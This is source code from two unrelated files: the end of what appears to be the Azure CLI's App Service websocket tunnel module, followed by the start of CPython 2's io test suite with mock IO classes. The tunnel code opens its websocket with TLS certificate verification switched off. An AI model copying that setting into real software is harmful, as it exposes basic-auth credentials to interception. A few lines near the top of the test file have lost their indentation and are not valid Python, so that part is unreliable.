        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
            # connect_ex returning 0 means something answered, i.e. port in use.
            if sock.connect_ex(('', self.local_port)) == 0:
                logger.info('Port %s is NOT open', self.local_port)
            else:
                logger.info('Port %s is open', self.local_port)
                is_port_open = True
            return is_port_open

    def is_webapp_up(self):
        """Query the tunnel status endpoint; True when the app is started and reachable.

        Returns False when the app is still starting or no state is reported;
        raises CLIError when the app is stopped, SSH is unreachable, or the
        status request fails. NOTE: falls through (returning None, falsy) for
        unrecognized state values.
        """
        import certifi
        import urllib3
        from azure.cli.core.util import should_disable_connection_verify
        try:
            import urllib3.contrib.pyopenssl
            urllib3.contrib.pyopenssl.inject_into_urllib3()
        except ImportError:
            pass
        http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
        if should_disable_connection_verify():
            # CLI configured to skip TLS verification.
            http = urllib3.PoolManager(cert_reqs='CERT_NONE')
        headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(self.remote_user_name, self.remote_password))
        url = 'https://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx?GetStatus&GetStatusAPIVer=2')
        r = http.request(
            'GET',
            url,
            headers=headers,
            preload_content=False
        )
        logger.warning('Verifying if app is running....')
        if r.status != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                url, r.status, r.reason))
        resp_msg = r.read().decode('utf-8')
        json_data = json.loads(resp_msg)
        if json_data.get('state', None) is None:
            return False
        if 'STARTED' in json_data["state"].upper():
            if json_data["canReachPort"] is False:
                raise CLIError(
                    'SSH is not enabled for this app. '
                    'To enable SSH follow this instructions: '
                    'https://go.microsoft.com/fwlink/?linkid=2132395')
            if json_data["canReachPort"] is True:
                logger.warning("App is running. Trying to establish tunnel connection...")
                return True
        elif 'STOPPED' in json_data["state"].upper():
            raise CLIError(
                'SSH endpoint unreachable, your app must be '
                'running before it can accept SSH connections.'
                'Use `az webapp log tail` to review the app startup logs.')
        elif 'STARTING' in json_data["state"].upper():
            logger.warning('Waiting for app to start up... ')
            return False

    def _listen(self):
        """Accept-loop: for each local client, open a websocket and pump both directions."""
        self.sock.listen(100)
        index = 0
        basic_auth_string = self.create_basic_auth()
        while True:
            self.client, _address = self.sock.accept()
            # One-hour inactivity timeout on both the client socket and the websocket.
            self.client.settimeout(60 * 60)
            host = 'wss://{}{}'.format(self.remote_addr, '/AppServiceTunnel/Tunnel.ashx')
            basic_auth_header = 'Authorization: Basic {}'.format(basic_auth_string)
            cli_logger = get_logger()  # get CLI logger which has the level set through command lines
            is_verbose = any(handler.level <= logs.INFO for handler in cli_logger.handlers)
            if is_verbose:
                logger.info('Websocket tracing enabled')
                websocket.enableTrace(True)
            else:
                logger.info('Websocket tracing disabled, use --verbose flag to enable')
                websocket.enableTrace(False)
            self.ws = create_connection(host,
                                        sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),),
                                        class_=TunnelWebSocket,
                                        header=[basic_auth_header],
                                        sslopt={'cert_reqs': ssl.CERT_NONE},
                                        timeout=60 * 60,
                                        enable_multithread=True)
            logger.info('Websocket, connected status: %s', self.ws.connected)
            index = index + 1
            logger.info('Got debugger connection... index: %s', index)
            debugger_thread = Thread(target=self._listen_to_client, args=(self.client, self.ws, index))
            web_socket_thread = Thread(target=self._listen_to_web_socket, args=(self.client, self.ws, index))
            debugger_thread.start()
            web_socket_thread.start()
            logger.info('Both debugger and websocket threads started...')
            logger.info('Successfully connected to local server..')
            # Serve this client to completion before accepting the next one.
            debugger_thread.join()
            web_socket_thread.join()
            logger.info('Both debugger and websocket threads stopped...')
            logger.info('Stopped local server..')

    def _listen_to_web_socket(self, client, ws_socket, index):
        """Pump data from the websocket to the local client until either side closes."""
        try:
            while True:
                logger.info('Waiting for websocket data, connection status: %s, index: %s', ws_socket.connected, index)
                data = ws_socket.recv()
                logger.info('Received websocket data: %s, index: %s', data, index)
                if data:
                    # Set the response to echo back the received data
                    response = data
                    logger.info('Sending to debugger, response: %s, index: %s', response, index)
                    client.sendall(response)
                    logger.info('Done sending to debugger, index: %s', index)
                else:
                    break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
        finally:
            # Always tear down both ends of the tunnel.
            logger.info('Client disconnected!, index: %s', index)
            client.close()
            ws_socket.close()

    def _listen_to_client(self, client, ws_socket, index):
        """Pump data from the local client to the websocket until either side closes."""
        try:
            while True:
                logger.info('Waiting for debugger data, index: %s', index)
                buf = bytearray(4096)
                nbytes = client.recv_into(buf, 4096)
                logger.info('Received debugger data, nbytes: %s, index: %s', nbytes, index)
                if nbytes > 0:
                    responseData = buf[0:nbytes]
                    logger.info('Sending to websocket, response data: %s, index: %s', responseData, index)
                    ws_socket.send_binary(responseData)
                    logger.info('Done sending to websocket, index: %s', index)
                else:
                    break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            logger.warning("Connection Timed Out")
        finally:
            # Always tear down both ends of the tunnel.
            logger.info('Client disconnected %s', index)
            client.close()
            ws_socket.close()

    def start_server(self):
        """Start serving (blocks in the accept loop)."""
        self._listen()

    def get_port(self):
        """Return the (possibly auto-selected) local port."""
        return self.local_port
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
# Make every class defined in this module new-style under Python 2.
__metaclass__ = type

# Shadow the builtin with a bytes type that has Python-3 semantics, so the
# tests below behave the same on both major versions.
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
    """A RawIO implementation without read(), so as to exercise the default
    RawIO.read(), which falls back on readinto().

    Chunks queued in *read_stack* are handed out by readinto(); a queued
    None simulates a non-blocking "would block" result.  Reads past the
    end of the stack are tallied in _extraneous_reads.
    """

    def __init__(self, read_stack=()):
        self._read_stack = list(read_stack)
        self._write_stack = []
        self._reads = 0
        self._extraneous_reads = 0

    def write(self, b):
        self._write_stack.append(bytes(b))
        return len(b)

    def writable(self):
        return True

    def fileno(self):
        return 42

    def readable(self):
        return True

    def seekable(self):
        return True

    def seek(self, pos, whence):
        return 0   # wrong but we gotta return something

    def tell(self):
        return 0   # same comment as above

    def readinto(self, target):
        self._reads += 1
        room = len(target)
        if not self._read_stack:
            # Nothing queued: the caller read more than was provisioned.
            self._extraneous_reads += 1
            return 0
        chunk = self._read_stack[0]
        if chunk is None:
            # Simulated EWOULDBLOCK: consume the marker, signal via None.
            del self._read_stack[0]
            return None
        size = len(chunk)
        if size <= room:
            del self._read_stack[0]
            target[:size] = chunk
            return size
        # Chunk larger than the buffer: fill it and re-queue the remainder.
        target[:] = chunk[:room]
        self._read_stack[0] = chunk[room:]
        return room

    def truncate(self, pos=None):
        return pos
# Concrete variant backed by the C io implementation.
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
    pass
# Concrete variant backed by the pure-Python io implementation.
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
    pass
class MockRawIO(MockRawIOWithoutRead):
    """MockRawIOWithoutRead plus an explicit read() backed by the same
    read stack."""

    def read(self, n=None):
        """Pop and return the next queued chunk, or b"" when exhausted.

        Reads past the end of the stack are tallied in _extraneous_reads
        so tests can assert no unnecessary raw reads were issued.
        """
        self._reads += 1
        try:
            return self._read_stack.pop(0)
        except IndexError:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt
            # and SystemExit; pop(0) on an empty list can only raise
            # IndexError, so catch exactly that.
            self._extraneous_reads += 1
            return b""
# MockRawIO backed by the C io implementation.
class CMockRawIO(MockRawIO, io.RawIOBase):
    pass
# MockRawIO backed by the pure-Python io implementation.
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
    pass
class MisbehavedRawIO(MockRawIO):
    """Deliberately broken raw IO: every method reports wrong results.

    Used to verify that the buffered layers validate what the raw object
    claims (e.g. write() returning more bytes than were passed in).
    """

    def write(self, b):
        # Claim to have written twice as much as was actually recorded.
        return 2 * MockRawIO.write(self, b)

    def read(self, n=None):
        # Return the queued chunk duplicated.
        return 2 * MockRawIO.read(self, n)

    def seek(self, pos, whence):
        return -123

    def tell(self):
        return -456

    def readinto(self, buf):
        # Perform the real fill, then lie about how many bytes landed.
        MockRawIO.readinto(self, buf)
        return 5 * len(buf)
# MisbehavedRawIO backed by the C io implementation.
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
    pass
# MisbehavedRawIO backed by the pure-Python io implementation.
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
    pass
class CloseFailureIO(MockRawIO):
    """Raw IO whose first close() raises IOError; later closes are no-ops."""

    closed = 0

    def close(self):
        if self.closed:
            return
        # First call: mark closed on the instance, then fail.
        self.closed = 1
        raise IOError
# CloseFailureIO backed by the C io implementation.
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
    pass
# CloseFailureIO backed by the pure-Python io implementation.
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
    pass
class MockFileIO:
    """Mixin recording the size of every read made against the cooperating
    IO base class (combined with BytesIO by the C/Py subclasses).

    Each read()/readinto() appends the number of bytes obtained (or None
    for a would-block result) to ``read_history``.
    """

    def __init__(self, data):
        self.read_history = []
        super(MockFileIO, self).__init__(data)

    def read(self, n=None):
        result = super(MockFileIO, self).read(n)
        self.read_history.append(None if result is None else len(result))
        return result

    def readinto(self, b):
        count = super(MockFileIO, self).readinto(b)
        self.read_history.append(count)
        return count
# MockFileIO over the C BytesIO implementation.
class CMockFileIO(MockFileIO, io.BytesIO):
    pass
# MockFileIO over the pure-Python BytesIO implementation.
class PyMockFileIO(MockFileIO, pyio.BytesIO):
    pass
class MockNonBlockWriterIO:
    """Raw IO stub simulating a non-blocking writer.

    After block_on(c) is armed, the next write whose payload contains c
    either writes only the prefix before c (a partial write), or — when c
    is the very first byte — disarms the blocker and returns None to
    signal "would block".
    """

    def __init__(self):
        self._write_stack = []
        self._blocker_char = None

    def pop_written(self):
        """Return everything written so far and reset the record."""
        written = b"".join(self._write_stack)
        del self._write_stack[:]
        return written

    def block_on(self, char):
        """Block when a given char is encountered."""
        self._blocker_char = char

    def readable(self):
        return True

    def seekable(self):
        return True

    def writable(self):
        return True

    def write(self, b):
        b = bytes(b)
        if self._blocker_char:
            try:
                blocked_at = b.index(self._blocker_char)
            except ValueError:
                # Blocker byte absent: fall through to a normal full write.
                pass
            else:
                if blocked_at == 0:
                    # Would block immediately: disarm and signal via None.
                    self._blocker_char = None
                    return None
                # Partial write of the data before the blocker byte.
                self._write_stack.append(b[:blocked_at])
                return blocked_at
        self._write_stack.append(b)
        return len(b)
# Non-blocking writer stub wired to the C implementation's exception type.
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
    BlockingIOError = io.BlockingIOError
# Non-blocking writer stub wired to the Python implementation's exception type.
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
    BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
    # Core io tests, run against the C implementation by CIOTest and the
    # pure-Python one by PyIOTest; those subclasses supply self.open,
    # self.BytesIO, self.FileIO, self.IOBase, the mock classes, etc.

    def setUp(self):
        support.unlink(support.TESTFN)

    def tearDown(self):
        support.unlink(support.TESTFN)

    def write_ops(self, f):
        # Exercise write/seek/tell/truncate on a writable stream f.
        self.assertEqual(f.write(b"blah."), 5)
        f.truncate(0)
        self.assertEqual(f.tell(), 5)
        f.seek(0)
        self.assertEqual(f.write(b"blah."), 5)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"Hello."), 6)
        self.assertEqual(f.tell(), 6)
        self.assertEqual(f.seek(-1, 1), 5)
        self.assertEqual(f.tell(), 5)
        self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"h"), 1)
        self.assertEqual(f.seek(-1, 2), 13)
        self.assertEqual(f.tell(), 13)
        self.assertEqual(f.truncate(12), 12)
        self.assertEqual(f.tell(), 13)
        self.assertRaises(TypeError, f.seek, 0.0)

    def read_ops(self, f, buffered=False):
        # Exercise read/readinto/seek on a stream containing b"hello world\n".
        data = f.read(5)
        self.assertEqual(data, b"hello")
        data = bytearray(data)
        self.assertEqual(f.readinto(data), 5)
        self.assertEqual(data, b" worl")
        self.assertEqual(f.readinto(data), 2)
        self.assertEqual(len(data), 5)
        self.assertEqual(data[:2], b"d\n")
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.read(20), b"hello world\n")
        self.assertEqual(f.read(1), b"")
        self.assertEqual(f.readinto(bytearray(b"x")), 0)
        self.assertEqual(f.seek(-6, 2), 6)
        self.assertEqual(f.read(5), b"world")
        self.assertEqual(f.read(0), b"")
        self.assertEqual(f.readinto(bytearray()), 0)
        self.assertEqual(f.seek(-6, 1), 5)
        self.assertEqual(f.read(5), b" worl")
        self.assertEqual(f.tell(), 10)
        self.assertRaises(TypeError, f.seek, 0.0)
        if buffered:
            f.seek(0)
            self.assertEqual(f.read(), b"hello world\n")
            f.seek(6)
            self.assertEqual(f.read(), b"world\n")
            self.assertEqual(f.read(), b"")

    LARGE = 2**31

    def large_file_ops(self, f):
        # Seek/write/truncate beyond the 2 GB boundary.
        assert f.readable()
        assert f.writable()
        self.assertEqual(f.seek(self.LARGE), self.LARGE)
        self.assertEqual(f.tell(), self.LARGE)
        self.assertEqual(f.write(b"xxx"), 3)
        self.assertEqual(f.tell(), self.LARGE + 3)
        self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
        self.assertEqual(f.truncate(), self.LARGE + 2)
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 2)
        self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 1)
        self.assertEqual(f.seek(-1, 2), self.LARGE)
        self.assertEqual(f.read(2), b"x")

    def test_invalid_operations(self):
        # Try writing on a file opened in read mode and vice-versa.
        for mode in ("w", "wb"):
            with self.open(support.TESTFN, mode) as fp:
                self.assertRaises(IOError, fp.read)
                self.assertRaises(IOError, fp.readline)
        with self.open(support.TESTFN, "rb") as fp:
            self.assertRaises(IOError, fp.write, b"blah")
            self.assertRaises(IOError, fp.writelines, [b"blah\n"])
        with self.open(support.TESTFN, "r") as fp:
            self.assertRaises(IOError, fp.write, "blah")
            self.assertRaises(IOError, fp.writelines, ["blah\n"])

    def test_raw_file_io(self):
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertEqual(f.readable(), False)
            self.assertEqual(f.writable(), True)
            self.assertEqual(f.seekable(), True)
            self.write_ops(f)
        with self.open(support.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.readable(), True)
            self.assertEqual(f.writable(), False)
            self.assertEqual(f.seekable(), True)
            self.read_ops(f)

    def test_buffered_file_io(self):
        with self.open(support.TESTFN, "wb") as f:
            self.assertEqual(f.readable(), False)
            self.assertEqual(f.writable(), True)
            self.assertEqual(f.seekable(), True)
            self.write_ops(f)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readable(), True)
            self.assertEqual(f.writable(), False)
            self.assertEqual(f.seekable(), True)
            self.read_ops(f, True)

    def test_readline(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readline(), b"abc\n")
            self.assertEqual(f.readline(10), b"def\n")
            self.assertEqual(f.readline(2), b"xy")
            self.assertEqual(f.readline(4), b"zzy\n")
            self.assertEqual(f.readline(), b"foo\x00bar\n")
            self.assertEqual(f.readline(None), b"another line")
            self.assertRaises(TypeError, f.readline, 5.3)
        with self.open(support.TESTFN, "r") as f:
            self.assertRaises(TypeError, f.readline, 5.3)

    def test_raw_bytes_io(self):
        f = self.BytesIO()
        self.write_ops(f)
        data = f.getvalue()
        self.assertEqual(data, b"hello world\n")
        f = self.BytesIO(data)
        self.read_ops(f, True)

    def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; It takes
        # a long time to build the >2GB file and takes >2GB of disk space
        # therefore the resource must be enabled to run this test.
        if sys.platform[:3] == 'win' or sys.platform == 'darwin':
            support.requires(
                'largefile',
                'test requires %s bytes and a long time to run' % self.LARGE)
        with self.open(support.TESTFN, "w+b", 0) as f:
            self.large_file_ops(f)
        with self.open(support.TESTFN, "w+b") as f:
            self.large_file_ops(f)

    def test_with_open(self):
        for bufsize in (0, 1, 100):
            f = None
            with self.open(support.TESTFN, "wb", bufsize) as f:
                f.write(b"xxx")
            self.assertEqual(f.closed, True)
            f = None
            try:
                with self.open(support.TESTFN, "wb", bufsize) as f:
                    1 // 0
            except ZeroDivisionError:
                self.assertEqual(f.closed, True)
            else:
                self.fail("1 // 0 didn't raise an exception")

    # issue 5008
    def test_append_mode_tell(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "ab", buffering=0) as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "ab") as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "a") as f:
            self.assertGreater(f.tell(), 0)

    def test_destructor(self):
        record = []
        class MyFileIO(self.FileIO):
            def __del__(self):
                record.append(1)
                try:
                    f = super(MyFileIO, self).__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super(MyFileIO, self).close()
            def flush(self):
                record.append(3)
                super(MyFileIO, self).flush()
        f = MyFileIO(support.TESTFN, "wb")
        f.write(b"xxx")
        del f
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"xxx")

    def _check_base_destructor(self, base):
        # Common destructor-ordering check for the abstract base classes.
        record = []
        class MyIO(base):
            def __init__(self):
                # This exercises the availability of attributes on object
                # destruction.
                # (in the C version, close() is called by the tp_dealloc
                # function, not by __del__)
                self.on_del = 1
                self.on_close = 2
                self.on_flush = 3
            def __del__(self):
                record.append(self.on_del)
                try:
                    f = super(MyIO, self).__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(self.on_close)
                super(MyIO, self).close()
            def flush(self):
                record.append(self.on_flush)
                super(MyIO, self).flush()
        f = MyIO()
        del f
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])

    def test_IOBase_destructor(self):
        self._check_base_destructor(self.IOBase)

    def test_RawIOBase_destructor(self):
        self._check_base_destructor(self.RawIOBase)

    def test_BufferedIOBase_destructor(self):
        self._check_base_destructor(self.BufferedIOBase)

    def test_TextIOBase_destructor(self):
        self._check_base_destructor(self.TextIOBase)

    def test_close_flushes(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"xxx")

    def test_array_writes(self):
        a = array.array(b'i', range(10))
        n = len(a.tostring())
        with self.open(support.TESTFN, "wb", 0) as f:
            self.assertEqual(f.write(a), n)
        with self.open(support.TESTFN, "wb") as f:
            self.assertEqual(f.write(a), n)

    def test_closefd(self):
        self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
                          closefd=False)

    def test_read_closed(self):
        with self.open(support.TESTFN, "w") as f:
            f.write("egg\n")
        with self.open(support.TESTFN, "r") as f:
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.read(), "egg\n")
            file.seek(0)
            file.close()
            self.assertRaises(ValueError, file.read)

    def test_no_closefd_with_filename(self):
        # can't use closefd in combination with a file name
        self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)

    def test_closefd_attr(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"egg\n")
        with self.open(support.TESTFN, "r") as f:
            self.assertEqual(f.buffer.raw.closefd, True)
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.buffer.raw.closefd, False)

    def test_garbage_collection(self):
        # FileIO objects are collected, and collecting them flushes
        # all data to disk.
        f = self.FileIO(support.TESTFN, "wb")
        f.write(b"abcxxx")
        f.f = f
        wr = weakref.ref(f)
        del f
        support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"abcxxx")

    def test_unbounded_file(self):
        # Issue #1174606: reading from an unbounded stream such as /dev/zero.
        zero = "/dev/zero"
        if not os.path.exists(zero):
            self.skipTest("{0} does not exist".format(zero))
        if sys.maxsize > 0x7FFFFFFF:
            self.skipTest("test can only run in a 32-bit address space")
        if support.real_max_memuse < support._2G:
            self.skipTest("test requires at least 2GB of memory")
        with self.open(zero, "rb", buffering=0) as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "rb") as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "r") as f:
            self.assertRaises(OverflowError, f.read)

    def check_flush_error_on_close(self, *args, **kwargs):
        # Test that the file is closed despite failed flush
        # and that flush() is called before file closed.
        f = self.open(*args, **kwargs)
        closed = []
        def bad_flush():
            closed[:] = [f.closed]
            raise IOError()
        f.flush = bad_flush
        self.assertRaises(IOError, f.close) # exception not swallowed
        self.assertTrue(f.closed)
        self.assertTrue(closed) # flush() called
        self.assertFalse(closed[0]) # flush() called before file closed
        f.flush = lambda: None # break reference loop

    def test_flush_error_on_close(self):
        # raw file
        # Issue #5700: io.FileIO calls flush() after file closed
        self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', buffering=0)
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
        os.close(fd)
        # buffered io
        self.check_flush_error_on_close(support.TESTFN, 'wb')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', closefd=False)
        os.close(fd)
        # text io
        self.check_flush_error_on_close(support.TESTFN, 'w')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'w')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'w', closefd=False)
        os.close(fd)

    def test_multi_close(self):
        f = self.open(support.TESTFN, "wb", buffering=0)
        f.close()
        f.close()
        f.close()
        self.assertRaises(ValueError, f.flush)

    def test_RawIOBase_read(self):
        # Exercise the default RawIOBase.read() implementation (which calls
        # readinto() internally).
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
        self.assertEqual(rawio.read(2), b"ab")
        self.assertEqual(rawio.read(2), b"c")
        self.assertEqual(rawio.read(2), b"d")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"ef")
        self.assertEqual(rawio.read(2), b"g")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"")

    def test_fileio_closefd(self):
        # Issue #4841
        with self.open(__file__, 'rb') as f1, \
             self.open(__file__, 'rb') as f2:
            fileio = self.FileIO(f1.fileno(), closefd=False)
            # .__init__() must not close f1
            fileio.__init__(f2.fileno(), closefd=False)
            f1.readline()
            # .close() must not close f2
            fileio.close()
            f2.readline()

    def test_nonbuffered_textio(self):
        with warnings.catch_warnings(record=True) as recorded:
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', buffering=0)
            support.gc_collect()
        self.assertEqual(recorded, [])

    def test_invalid_newline(self):
        with warnings.catch_warnings(record=True) as recorded:
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', newline='invalid')
            support.gc_collect()
        self.assertEqual(recorded, [])
class CIOTest(IOTest):
    # IOTest run against the C-accelerated io implementation.

    def test_IOBase_finalize(self):
        # Issue #12149: segmentation fault on _PyIOBase_finalize when both a
        # class which inherits IOBase and an object of this class are caught
        # in a reference cycle and close() is already in the method cache.
        class MyIO(self.IOBase):
            def close(self):
                pass

        # create an instance to populate the method cache
        MyIO()
        obj = MyIO()
        obj.obj = obj
        wr = weakref.ref(obj)
        del MyIO
        del obj
        support.gc_collect()
        self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
    # IOTest run against the pure-Python implementation; array writes are
    # skipped because the pure-Python code relies on len() of the buffer.
    test_array_writes = unittest.skip(
        "len(array.array) returns number of elements rather than bytelength"
    )(IOTest.test_array_writes)
class CommonBufferedTests:
    # Tests common to BufferedReader, BufferedWriter and BufferedRandom.
    # Mixed into concrete TestCases that define self.tp and the mock classes.

    def test_detach(self):
        raw = self.MockRawIO()
        buf = self.tp(raw)
        self.assertIs(buf.detach(), raw)
        self.assertRaises(ValueError, buf.detach)

        repr(buf)  # Should still work

    def test_fileno(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertEqual(42, bufio.fileno())

    @unittest.skip('test having existential crisis')
    def test_no_fileno(self):
        # XXX will we always have fileno() function? If so, kill
        # this test. Else, write it.
        pass

    def test_invalid_args(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        # Invalid whence
        self.assertRaises(ValueError, bufio.seek, 0, -1)
        self.assertRaises(ValueError, bufio.seek, 0, 3)

    def test_override_destructor(self):
        tp = self.tp
        record = []
        class MyBufferedIO(tp):
            def __del__(self):
                record.append(1)
                try:
                    f = super(MyBufferedIO, self).__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super(MyBufferedIO, self).close()
            def flush(self):
                record.append(3)
                super(MyBufferedIO, self).flush()
        rawio = self.MockRawIO()
        bufio = MyBufferedIO(rawio)
        writable = bufio.writable()
        del bufio
        support.gc_collect()
        # A read-only buffer has nothing to flush on destruction.
        if writable:
            self.assertEqual(record, [1, 2, 3])
        else:
            self.assertEqual(record, [1, 2])

    def test_context_manager(self):
        # Test usability as a context manager
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        def _with():
            with bufio:
                pass
        _with()
        # bufio should now be closed, and using it a second time should raise
        # a ValueError.
        self.assertRaises(ValueError, _with)

    def test_error_through_destructor(self):
        # Test that the exception state is not modified by a destructor,
        # even if close() fails.
        rawio = self.CloseFailureIO()
        def f():
            self.tp(rawio).xyzzy
        with support.captured_output("stderr") as s:
            self.assertRaises(AttributeError, f)
        s = s.getvalue().strip()
        if s:
            # The destructor *may* have printed an unraisable error, check it
            self.assertEqual(len(s.splitlines()), 1)
            self.assertTrue(s.startswith("Exception IOError: "), s)
            self.assertTrue(s.endswith(" ignored"), s)

    def test_repr(self):
        raw = self.MockRawIO()
        b = self.tp(raw)
        clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
        self.assertEqual(repr(b), "<%s>" % clsname)
        raw.name = "dummy"
        self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
        raw.name = b"dummy"
        self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)

    def test_flush_error_on_close(self):
        # Test that buffered file is closed despite failed flush
        # and that flush() is called before file closed.
        raw = self.MockRawIO()
        closed = []
        def bad_flush():
            closed[:] = [b.closed, raw.closed]
            raise IOError()
        raw.flush = bad_flush
        b = self.tp(raw)
        self.assertRaises(IOError, b.close) # exception not swallowed
        self.assertTrue(b.closed)
        self.assertTrue(raw.closed)
        self.assertTrue(closed) # flush() called
        self.assertFalse(closed[0]) # flush() called before file closed
        self.assertFalse(closed[1])
        raw.flush = lambda: None # break reference loop

    def test_close_error_on_close(self):
        raw = self.MockRawIO()
        def bad_flush():
            raise IOError('flush')
        def bad_close():
            raise IOError('close')
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(IOError) as err: # exception not swallowed
            b.close()
        self.assertEqual(err.exception.args, ('close',))
        self.assertFalse(b.closed)

    def test_multi_close(self):
        raw = self.MockRawIO()
        b = self.tp(raw)
        b.close()
        b.close()
        b.close()
        self.assertRaises(ValueError, b.flush)

    def test_readonly_attributes(self):
        raw = self.MockRawIO()
        buf = self.tp(raw)
        x = self.MockRawIO()
        with self.assertRaises((AttributeError, TypeError)):
            buf.raw = x
class SizeofTest:
    # Mixin checking that a buffered object's sys.getsizeof() grows with its
    # buffer size (CPython-specific memory accounting).

    @support.cpython_only
    def test_sizeof(self):
        bufsize1 = 4096
        bufsize2 = 8192
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize1)
        # Base object size, independent of the buffer.
        size = sys.getsizeof(bufio) - bufsize1
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize2)
